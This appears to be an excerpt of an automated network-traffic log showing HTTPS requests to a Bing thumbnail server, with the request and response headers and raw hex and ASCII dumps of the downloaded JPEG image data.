                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 76 b6 e5 60 79 04 11 d6 99 25 f5 cb c2 b1 09 59 a3 66 cf 94 cc 59 73 f4 a5 ec d4 ed 28 3d 0d 23 1e 56 d3 24 9a 37 83 fd 22 25 db 0c 8d 86 f9 b7 6d fc 3d 2b 6a 3f 0e 6a fa af 87 db 55 b2 81 65 b6 8d be 65 59 0b 4d 8e ed b0 64 ed 1e b5 17 87 6c 9e e2 d5 8d e7 9b 6d 6e cd 86 65 8f 73 30 fc 70 3d ba d7 75 e1 2d 0a fc e8 3a bd ef 87 f4 f6 bc 8a da 3f dd c9 c7 da 54 0e bb 55 4e 76 f3 cf ad 70 e3 71 7e c2 37 ba 4e eb 7d 8d a8 52 55 27 6e 87 35 e0 dd 26 ce d1 62 3a 86 95 77 2d d5 c4 83 ca 65 93 cb dc 09 fe eb a9 c7 4e b8 ac ef 1c da e9 d6 be 22 ff 00 44 be b9 91 d7 77 99 1c b1 a7 fa 39 cf 0a ac 84 87 5f 71 5d 85 8f 89 a4 bd d5 ad ae b5 0b 69 2e 96 ce 33 f6 4b 4e 19 57 27 f8 cf 1d fd 2a 9f 8f ad 6c 3c 4d ab 5b 5e e8 d6 7f 61 f3 ee 48 b9 82 4c 0f 32 43 8c b4 64 0c
                                                                                                                                                                                                                                                                            Data Ascii: v`y%YfYs(=#V$7"%m=+j?jUeeYMdlmnes0p=u-:?TUNvpq~7N}RU'n5&b:w-eN"Dw9_q]i.3KNW'*l<M[^aHL2Cd
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 53 7c 5d a7 cb a9 5b c5 ab c9 e2 38 7e c7 3a 87 bd 8b ed 21 16 1f 2f 0a 4a 80 09 2d b4 ff 00 09 15 cb fc 0a f1 55 d5 97 81 53 4c b8 bb d3 f5 00 b7 7b 20 d3 ee ed b7 c7 0f 98 7e 52 64 ed 9f 4e a2 b7 3e 26 45 a1 5a c7 2c 9e 25 b1 b6 93 55 b9 b2 1f 66 bd d2 d8 2c 9b d5 f0 53 6b 0c 6e 3d 33 c9 61 59 d4 c0 53 c1 66 6e 95 28 b4 ee ed b4 b4 bf 44 d2 b2 57 d4 21 8a 9d 6a 17 94 8b 7a 0e ad a2 e9 fa 85 a6 85 25 a4 31 59 cb e5 48 d2 5f 5d 9b 95 b8 7e 4e e9 1c 30 08 c3 a8 53 cf 61 de bd 57 54 b1 d2 e4 d3 63 bb 30 2f 93 a7 c9 e6 44 b1 4e 64 58 c1 c8 dc ae a4 32 a9 ef cf 02 bc 57 e0 2d de 9f 73 35 e5 bd bd 8e a9 6d 07 9a 52 ef e6 89 2e 23 4c e5 77 46 41 2e 41 ee 07 18 e9 5d 4d f6 bf 71 e1 1f 12 49 61 ab c1 a4 ff 00 c2 3f a8 6e 0c d1 e1 16 64 38 23 7a 33 02 ac 06 72 00
                                                                                                                                                                                                                                                                            Data Ascii: S|][8~:!/J-USL{ ~RdN>&EZ,%Uf,Skn=3aYSfn(DW!jz%1YH_]~N0SaWTc0/DNdX2W-s5mR.#LwFA.A]MqIa?nd8#z3r
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: d2 7d 8b cc d8 b1 b8 fb ad e6 72 57 3f dd f4 ef 5c 3f c4 4d 6b 53 bf f1 54 97 62 f2 da 53 1f dd 9e d2 41 b5 b0 31 b8 36 01 e9 5c f2 98 a1 dd 0c 5d 36 fc ad 27 f9 ef 53 e9 fa 4e a7 7b 1e 20 8a 49 7a ed 8d 54 b7 4a db 0f 80 a7 86 a8 ea 39 b7 d3 5b 7e 64 54 c7 4e b4 39 14 6d e8 74 9f 0b 2f b4 8d 0f 56 6b 9d 52 cf ed c6 78 c8 fd dc 9b 1a dc 1e 19 b7 60 9e 87 b5 7a df 86 3e 19 7c 29 ba b3 68 a7 5d 42 79 6e a3 52 d7 2b 7a 44 70 83 d1 a3 60 a0 03 db 69 cd 79 3f 80 f5 6b cf 0d c9 1c a9 2d b4 ec b9 32 e9 f7 31 87 56 3e a5 58 63 8f ad 7a b7 83 7e 21 1b 2f 03 cb 73 a8 78 4e 49 4c 53 84 93 ec 91 a4 2a a5 cf cb fb be 3e 53 ec 0d 7c 8f 14 43 32 93 e6 c1 39 2d 97 bb 2b 5f e4 fb 1d 99 74 63 2f 76 ae cb ba 2f 78 a3 c0 3a 37 86 74 9b cb 7d 05 af 23 d3 e2 80 f9 ac cb f6 96
                                                                                                                                                                                                                                                                            Data Ascii: }rW?\?MkSTbSA16\]6'SN{ IzTJ9[~dTN9mt/VkRx`z>|)h]BynR+zDp`iy?k-21V>Xcz~!/sxNILS*>S|C29-+_tc/v/x:7t}#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16067INData Raw: da 2c 5f 34 ec 99 da bb 1c 67 3d f3 c9 ed 51 f8 d3 c4 57 1e 16 f0 9b f8 4e 5d 41 75 09 2e 60 f2 ef 20 9e 49 37 e3 3d 1c bf dc 6d be 99 cd 78 6c de 2a d6 2e 34 d8 e3 fe d5 91 62 8b e7 6b 6d c5 97 23 bf d7 f9 55 0d 5a f7 51 bc b3 8f 58 b8 82 76 85 98 c7 e7 c8 a5 91 8a f6 2f d3 23 eb 59 53 e1 87 2a 91 78 a9 c5 c5 3b a5 6b 6b d0 af ed 17 6f 75 3b d8 f6 cf 06 78 df fe 11 1f 04 c4 e9 06 97 24 5f 32 2a c9 6c 36 cd ed 94 5f 97 1e e4 9a e9 fe 20 68 f7 3e 3b f0 0c 3a a6 a1 7d 6d 13 ca d1 b4 11 c4 a5 2d 6d cf f1 3c e3 19 73 8e 01 e4 0f 4e 6b c5 7e 1b eb d2 eb 57 56 da 14 f6 36 91 da c7 f7 5b 6e e6 f3 1b e5 07 be 73 f4 af 78 f1 fe 93 a4 f8 5b e0 cc 9a 44 12 47 6b 7d 3c 45 3e c9 7b bc ad c6 4e 79 f9 5b 67 cd cf 05 57 e9 5e 0e 79 46 9e 07 30 a0 a9 fb b5 a7 3d f7 d3 f4
                                                                                                                                                                                                                                                                            Data Ascii: ,_4g=QWN]Au.` I7=mxl*.4bkm#UZQXv/#YS*x;kkou;x$_2*l6_ h>;:}m-m<sNk~WV6[nsx[DGk}<E>{Ny[gW^yF0=
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 2c ea fe 22 f0 0c 5a 5c 51 43 a7 db 23 0f 36 da ca 11 1a 48 79 f9 9b a9 2d cf ad 7a b8 3c 93 1d 53 31 a5 8c be 89 db de 5a ab f9 e9 f2 d3 43 1c 4d 6c 15 1a 32 a7 39 eb d6 df a5 ae 2f c2 9f 85 3a d6 a7 63 3d ec 97 d2 d9 c7 6a db e2 f3 18 2c 73 0f e3 01 f7 7c a7 68 38 f5 af 4a f0 2c be 15 d1 b5 ab 8d 67 56 d7 a7 b7 b5 4b 66 32 69 97 bb be d9 72 15 80 5f 2f 1f 26 dc 71 9c fa fa 57 cd 7a 0f 88 75 5b 58 67 b6 8a fa e5 61 9f 3e 64 7e 61 da d9 ef 8f 5a 6d d5 e4 f2 49 19 79 19 bc b5 c2 ee 6d dc 57 d9 62 b2 4a f8 99 cb db 54 f7 7c 91 e4 e1 b3 8c 25 2a 4b d9 41 df cd 9f 45 1f 8c 9a 24 76 f7 56 fe 17 d3 67 81 d7 cc 4b 68 a5 90 3c 4b bb 3c fa ff 00 c0 7a 57 8e ea 97 fa a6 a3 a9 29 bd bc 96 72 b2 13 fb c9 0b 6d c9 c9 c7 a7 35 93 e1 32 cd 79 91 f2 9d d9 ae b2 df 4f dd
                                                                                                                                                                                                                                                                            Data Ascii: ,"Z\QC#6Hy-z<S1ZCMl29/:c=j,s|h8J,gVKf2ir_/&qWzu[Xga>d~aZmIymWbJT|%*KAE$vVgKh<K<zW)rm52yO
                                                                                                                                                                                                                                                                            2024-12-27 06:09:27 UTC16384INData Raw: 1a 6d e5 fc 57 26 19 52 c6 7f 33 6f fb 41 f1 c8 35 c2 ac 92 bd d6 e0 bf f7 cd 2d c9 95 26 de 77 7f c0 aa 5e 5d 37 53 de 92 e5 7b ab 2d 7e 61 fd ab 86 f6 4d 46 9e bd 1d de 9f 23 d0 fe 1d f8 d6 58 75 68 ec b5 8d 71 6d ac 24 65 92 59 20 b6 32 3c 87 d1 b2 46 71 d7 19 02 bb 8d 5b e2 96 91 67 6f 2c 96 d7 da b3 dc 2c eb 1b 6d 54 56 68 94 93 bc 1c 9e 4f cb c1 e0 7b d7 83 5a ca 3c ce 56 b5 21 06 55 60 9f c5 c3 7f b5 5c 38 ce 1e c1 d7 aa aa 54 87 c8 e8 c2 67 52 84 1c 62 95 fc ce 9b c6 1e 31 83 50 d3 fe c5 6d 79 ab 5d 69 6b 26 f8 e2 d4 2e 77 ed 90 e4 f4 5e 3a 93 4b f0 0f c7 d7 9e 07 f1 f4 77 96 d3 c1 15 b5 d4 4d 04 f1 cf 07 99 1e 1b 8d db 32 32 c3 de b9 fb 1d 20 98 65 89 fe ec 8b 95 5f e5 59 ab 62 12 e2 40 fd 56 bb a9 e0 f0 aa 84 a8 45 68 ce 7a 98 ec 4f b5 8d 54 95
                                                                                                                                                                                                                                                                            Data Ascii: mW&R3oA5-&w^]7S{-~aMF#Xuhqm$eY 2<Fq[go,,mTVhO{Z<V!U`\8TgRb1Pmy]ik&.w^:KwM22 e_Yb@VEhzOT


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            15192.168.2.649767150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:29 UTC346OUTGET /th?id=OADD2.10239360433145_1P8I9JAN4TGEHJX5M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 482331
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 04A788E481E24D29B73272191870E0B3 Ref B: EWR30EDGE1615 Ref C: 2024-12-27T06:09:29Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:29 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 35 39 3a 30 37 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:59:078C
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: c4 ab f2 ad 3d a2 b4 b9 91 64 81 67 f2 d5 b7 32 b7 af a5 6b ec d3 6a 4c 54 a3 74 4b 22 8b 8b 7f 35 ff 00 78 cd ca c7 fd da ad 2f d8 85 bb 19 fa b7 f0 ff 00 7b b6 31 4b 75 79 25 bb 20 b3 5e 59 4e e6 6f e1 ff 00 f5 55 8d 53 46 bd 8f 4f 5b d7 6f dd 37 f3 ad 62 2a b0 bb ba 31 ad d5 2e 61 90 49 f2 2a ff 00 ab 8f ff 00 af 50 5c c1 34 76 be 7c ea cc 15 87 dd 5a bb a7 c4 62 fd f4 4e b2 1e 47 97 bb bf d2 9f 73 75 3c ea d6 d2 7e ed 64 61 f3 37 dd 5f a1 f5 35 a6 bb 74 08 ec 99 66 13 75 fd 9b 14 71 dc aa af fb 2d f3 73 51 48 d1 da 42 be 5c 4c d2 2e 46 e6 63 d4 f5 ab d0 da c7 1e 9b e5 c5 13 4c 76 ff 00 17 a9 ac fb cb 1b 8f 27 78 55 dd d7 ef 77 f4 ac ef 1e 63 9e ba b3 33 2e a7 46 fd c6 df bd 8a ba b1 91 a7 f9 73 c5 b9 5b 95 65 5f 99 6a 27 24 2a b8 55 59 38 dd fd e8 e8
                                                                                                                                                                                                                                                                            Data Ascii: =dg2kjLTtK"5x/{1Kuy% ^YNoUSFO[o7b*1.aI*P\4v|ZbNGsu<~da7_5tfuq-sQHB\L.FcLv'xUwc3.Fs[e_j'$*UY8
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 65 58 a5 5f 95 97 e5 da 3d 85 66 49 2c 91 dc 2e 19 94 37 0c bf fd 7a 85 26 f6 22 f2 44 b7 82 54 9b fd 21 b6 9f f7 7e ed 2c b1 69 d2 ae f9 12 7f 33 6e 77 2f ad 3a 35 17 1b 97 cf 5c ee f9 bc cf 9a 9c aa 55 be ec 72 6e 5f 97 fb b5 4a 56 ea 3b df a8 96 66 31 e5 89 e7 fd d6 ed cd f3 7a 77 c5 43 a8 4e b6 ed be de 58 e4 fe f7 f1 37 3f a0 a8 af e2 66 56 91 db 64 6d f7 7f 1e 2a 2b 38 61 8f 69 95 99 bf 79 85 5f e2 c7 5c d5 5d 15 ce d1 6a 3b a4 92 dd 5f ca 6f 3b 6f cc ca df 2d 57 09 71 75 70 c4 33 66 35 3f f0 1c f5 35 72 c4 c1 3d c3 b2 7c c1 78 f9 bd 2a f5 fc 76 f6 da 7f 12 ee 95 58 15 91 57 e5 5c 70 72 05 4a 92 b9 b4 2f 33 29 55 ae 63 8a df cd 69 56 36 f9 63 8d 42 d4 7e 28 b4 8a 36 d3 e5 76 68 d7 e6 0c bf c5 9a b3 1b 3b 79 97 16 8d 24 b2 2a 93 b5 7e 5e 7d 00 15 56
                                                                                                                                                                                                                                                                            Data Ascii: eX_=fI,.7z&"DT!~,i3nw/:5\Urn_JV;f1zwCNX7?fVdm*+8aiy_\]j;_o;o-Wqup3f5?5r=|x*vXW\prJ/3)UciV6cB~(6vh;y$*~^}V
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 99 7d 19 f3 bf 7e df 36 ec 36 df ba b9 a2 da ea 63 4d 3d 4b 68 da 7d db 7d b2 f1 b6 af 3f 2c 7f 7b 20 f5 3f e1 52 dc 6a 3a 5f cd 1d 95 9c f8 f3 00 8e 4d bb 77 39 a6 78 7e 4b 38 a6 92 29 60 55 f9 7e 66 8d 7e 69 2b 42 19 e0 b8 b5 5c ac 9e 54 1f c0 ab f7 7d 39 14 d8 4a e6 af 84 ad 1c 2f 99 b7 cb 9a 5c 96 66 e7 8f 4c d6 85 fc 08 f1 b2 6e e6 35 fb df dd c7 f4 aa 1a 5c 37 13 cc b7 43 cc 8a 38 97 72 c7 23 6d 65 a9 a6 b8 c3 6f 32 f9 5b b9 55 5f 9b eb fe 35 93 bd ee 73 34 dc 84 b6 b6 91 a1 54 dc b1 ee ce df 94 74 f7 ab 36 f0 23 5e 79 50 ca bb a3 8c 3a af d2 a9 ea 17 e5 6c d8 c6 ab e6 37 dd ff 00 67 d4 d4 0d 79 6f 23 42 04 aa b2 2e 37 7c df 2b 03 d6 a7 56 cb 54 64 d9 b0 66 12 ed c6 ed b1 b7 cc cb eb ed 53 69 f0 09 64 90 f9 ac a7 77 ca bb 86 df 6c fd 6b 1a 4b 98 ec
                                                                                                                                                                                                                                                                            Data Ascii: }~66cM=Kh}}?,{ ?Rj:_Mw9x~K8)`U~f~i+B\T}9J/\fLn5\7C8r#meo2[U_5s4Tt6#^yP:l7gyo#B.7|+VTdfSidwlkK
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: be f3 24 d5 6d 3c b9 97 e5 69 24 1b 79 ef 44 93 4c e9 a7 0d 35 39 8b 1f 80 fe 0e 0c cf 67 e2 1b 99 66 97 95 59 14 22 7e 95 15 e7 c1 7d 1a de de 58 ef 35 a9 22 1d 23 db 38 dc a6 bb 4b 9b 9d 1e 1b c5 09 a9 c1 22 b2 e1 99 5b 6a b7 d0 d4 3a 84 fa 5b c6 d3 ad cd b4 8a bf dd 9c 37 35 93 8a 34 b1 e3 ba de 83 a1 7c 3c d2 75 2d 60 5c dc cf 37 94 52 2f 33 e7 6c 9e 3e 5a f9 bf 5b 62 9a 85 8c 72 f9 99 b9 9d a6 95 64 fb 92 0c f1 fc eb da ff 00 6b 7f 14 d8 4b 63 06 91 a7 de 46 c5 9b 32 b4 5f 7b e8 2b c1 e1 96 7d 67 5a 91 f7 6e fb 34 62 38 f7 7d ec 9f 4a ec a5 1b 46 e3 4b a9 eb 7f 01 2d 60 6b 8b 9b 88 95 90 2c 80 40 df 77 8e f5 ef f6 36 f1 a4 6a 04 bb ba 16 66 fb cd 5e 77 f0 a7 c2 c2 c2 de da db ef 08 e0 52 db 7e 5e bc d7 a7 c5 66 90 d9 ab ee dc db 87 f1 76 ae 3a b2 4e
                                                                                                                                                                                                                                                                            Data Ascii: $m<i$yDL59gfY"~}X5"#8K"[j:[754|<u-`\7R/3l>Z[brdkKcF2_{+}gZn4b8}JFK-`k,@w6jf^wR~^fv:N
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: aa bf ad 68 9a 60 7a d7 c2 7f 8c 57 ba 5c d1 59 6e fd cb 48 3f d1 a4 5d db 41 fe e1 fe 11 ed 5e bf af f8 7b c1 ff 00 15 34 ff 00 3f 4f 95 74 fd 4e 35 05 96 3f 95 f2 bf ce be 3c b7 59 d3 6c 91 b7 97 b5 be f2 fc bb 4d 77 1e 01 f8 85 7f a4 5c 45 25 e2 ca de 57 2b 3c 6d f3 af d4 7a 54 4a 9d f5 5b 87 2f 63 bc f1 c7 81 75 cf 0d 5a c8 6e d5 67 b4 8d 89 8a 78 17 26 4c f1 f3 d6 4d 86 89 7f 2d 8b 5e 58 e9 ea e5 57 13 4b 27 cf 12 9f a9 e0 62 bd 2f c1 7f 18 34 bd 6b 49 6d 17 5f 58 e2 b7 b9 5c b5 da c7 bc 30 07 07 70 1d 0d 74 5e 32 f8 4d 61 a9 68 f1 5e f8 2b 5e 58 ed bf d7 c7 04 6c 1e de e8 9f e1 3f dd cd 66 dc 96 e0 ee 78 26 a5 63 65 0b 4b 6f 3b 2a dd 6c 05 55 7f 79 ff 00 02 dd da b3 ae 74 f5 83 4f f3 ed ef 25 58 e4 90 ed 89 be 67 fd 7b 57 71 7d 6e 9a 3d c4 ba 36 ab
                                                                                                                                                                                                                                                                            Data Ascii: h`zW\YnH?]A^{4?OtN5?<YlMw\E%W+<mzTJ[/cuZngx&LM-^XWK'b/4kIm_X\0pt^2Mah^+^Xl?fx&ceKo;*lUytO%Xg{Wq}n=6
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 0d 79 97 b6 52 35 ce 95 1f fa b6 b9 60 ff 00 a1 3d eb 13 c4 de 17 d5 34 59 b1 b5 9a 38 db e5 91 1b 72 f1 ee 2a d6 95 e2 ad 46 d9 62 87 50 dd 73 6b b8 7e e2 4f bb 9f 7a d5 79 32 92 d6 e8 d1 f0 ef 8a 6c f5 bf f4 39 e5 6b 69 1a 40 f2 2c 93 94 8f 23 b7 1f ca ba fd 79 20 96 66 b7 8d 60 fb 1c 71 8f 31 ad 94 33 37 a8 c8 ae 37 56 93 44 f1 6b 37 ee 97 4a 8e 3c 7c b1 28 dc c7 eb 55 3c 8f 19 f8 62 d6 49 e1 66 6b 0f bd b6 36 0d c7 fb bd 73 4e c2 ea 75 92 5c c5 24 71 79 b1 4f fd 9f 02 8f 2a d9 97 66 e3 f8 55 6d 41 be ca cc 60 95 7c ed 41 80 58 ed b3 bd 47 4e 49 a6 f8 3f c4 da 25 fa db 5b 45 e6 35 f4 59 3b b5 0f 95 17 3e 80 f7 ad 4b 8b 8b 84 d6 96 e2 59 67 b9 92 d5 48 f3 20 50 b0 c7 c7 af 7a 5a 8a ec 2e 34 9b 4f b4 41 a5 4f 07 ee a0 5f 3e 55 66 f9 1b f0 a9 2f b6 ba b5
                                                                                                                                                                                                                                                                            Data Ascii: yR5`=4Y8r*FbPsk~Ozy2l9ki@,#y f`q1377VDk7J<|(U<bIfk6sNu\$qyO*fUmA`|AXGNI?%[E5Y;>KYgH PzZ.4OAO_>Uf/
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16067INData Raw: 6f 35 5d 13 52 d9 2f 98 cd 16 42 c7 2e 76 ae 3d 3d 4d 74 5a 3f 8c ec af 6f 9a 4d 76 2d d1 2a fc b1 4b f3 27 f9 35 7a 86 a8 de d2 bc 55 a6 6b 76 31 e9 fa 55 de e6 91 80 91 ae 63 40 b1 d6 8d c6 97 1d ae a9 15 9d b4 b0 79 8c bb e4 9d a5 f3 78 f6 f4 ae 43 58 d3 f4 bd 55 7f b4 f4 e9 56 ce 25 ce cb 6b 65 cf 98 48 a5 f0 f5 cf 8b 3c 3d 6f 24 93 59 ff 00 67 db b2 e3 cf 9e 0f 31 a4 1e c3 af e1 53 61 7a 1d 1d bd d4 13 49 79 a6 5c 6d 68 ae 5b 11 49 26 55 77 f4 e3 1d 8d 51 d7 26 8b 4a d0 6e 63 bb fb 23 49 1f ee e3 82 05 c3 37 3d 4f f8 f5 ac 9f 11 78 cf cd f0 ca e9 76 16 31 db 2c 99 3f 6b b9 5f df 33 ff 00 b2 bd ab 87 6b bb db 88 da 71 3b 31 89 86 d8 d9 8e e6 ad 14 4a eb 63 6f c4 3e 29 d5 75 0b 1c c8 cb 6d 6d 04 62 3f 29 5b e6 6c 71 d7 af 4a c2 bd bb 8a f2 18 c5 a5 9f
                                                                                                                                                                                                                                                                            Data Ascii: o5]R/B.v==MtZ?oMv-*K'5zUkv1Uc@yxCXUV%keH<=o$Yg1SazIy\mh[I&UwQ&Jnc#I7=Oxv1,?k_3kq;1Jco>)ummb?)[lqJ
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 78 a1 68 f6 37 95 9e bd b2 01 aa cb 0e 9c d0 e2 4b eb b9 37 36 59 59 51 57 1e 9c 9a 9e fa 18 ef 34 18 e5 92 e5 62 31 c8 03 7e e0 bb 49 91 ed 53 69 f6 fe 1f 69 3e cf a8 6a ed 6a ad 18 fd e4 76 00 85 23 9c 7a d6 72 d0 68 ee bf 65 3d 52 db 4c f1 d5 cd 85 bb 33 2e a1 03 06 8e 4c 6e 5d bc 8f ad 5d f8 81 0b af 8d 3c 42 6c a7 56 5d b1 cc bf 36 de 17 96 18 ed 9a e3 fc 16 74 3d 2f e2 56 95 35 97 88 7e d5 ba 5d 9b 56 db 66 ef c6 bd 4b c7 da 74 52 f8 eb ed 10 45 1c 71 6b 1a 5b 5b ee 5f 97 6c 98 e0 b7 e3 51 74 a4 98 5f 5b 9e eb e1 19 e3 b8 f0 ce 9f 2c 0c de 4c 96 d1 bc 7f c4 dc 8f 5a 9f c5 cf 9f 07 ea 52 7d d6 5b 6f 95 bf bb 5c e7 c1 0b a1 77 f0 9f 43 7d df bc 8e db cb 91 5b d5 49 15 ad e3 19 87 fc 22 7a 84 72 37 97 ba 1f 97 f3 ae 57 a4 99 aa f8 4d 0b 39 63 fe c9 b6
                                                                                                                                                                                                                                                                            Data Ascii: xh7K76YYQW4b1~ISii>jjv#zrhe=RL3.Ln]]<BlV]6t=/V5~]VfKtREqk[[_lQt_[,LZR}[o\wC}[I"zr7WM9c
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: eb 73 a2 6a 10 58 dc 4c db d5 ad 9b 6a 5c 21 e7 28 7f c9 cd 79 0f 8a b4 b9 74 2f 10 4b 6f 7b 63 77 75 2c f1 83 1d cc ab f2 ef ec a3 3f 7a 94 25 76 52 d5 98 f6 d0 58 2f 96 f2 41 e5 47 d1 7f ba a3 db df 35 53 59 b9 b7 86 e1 67 b2 6d b6 b1 67 73 48 dd fd b1 56 75 0d 2f 58 8f 49 6b 93 73 e6 43 73 c3 5b 44 bc e4 75 15 94 da 6c 7a 55 c5 b4 a8 d7 d3 c3 2f ef 1a 29 63 ff 00 57 fe 38 35 aa 68 77 b0 cb 6f 12 4f 7e d2 69 c9 79 34 03 ee ee 69 3e f7 ae d3 eb 5e e1 f0 1b e2 0e ff 00 0f c1 a1 f8 8e e6 58 ee a0 94 41 65 73 27 cd f6 a8 cf dd df ee 3d 6b c4 ef b4 f5 d4 64 fb 4a b7 d9 44 58 31 ac 71 fc ed 9f ad 16 fa d6 bd a5 c8 bf 6a b6 fb 4c 6b 9d b2 5c fc 8e b8 3d 54 d4 ce 2a 4a c8 a4 ed b1 f6 76 9f 2c af f2 3c 4d b7 a3 36 df eb 57 ad 8e d6 64 93 76 57 ee ee fb d5 f3 77
                                                                                                                                                                                                                                                                            Data Ascii: sjXLj\!(yt/Ko{cwu,?z%vRX/AG5SYgmgsHVu/XIksCs[DulzU/)cW85hwoO~iy4i>^XAes'=kdJDX1qjLk\=T*Jv,<M6WdvWw


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            16192.168.2.649766150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:29 UTC375OUTGET /th?id=OADD2.10239360433144_1RLNQD8OFQA9LQ1KZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 584217
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: A49FCAB8AB484B7A9109B0ADAC90468B Ref B: EWR30EDGE0113 Ref C: 2024-12-27T06:09:29Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:29 GMT
                                                                                                                                                                                                                                                                            Connection: close
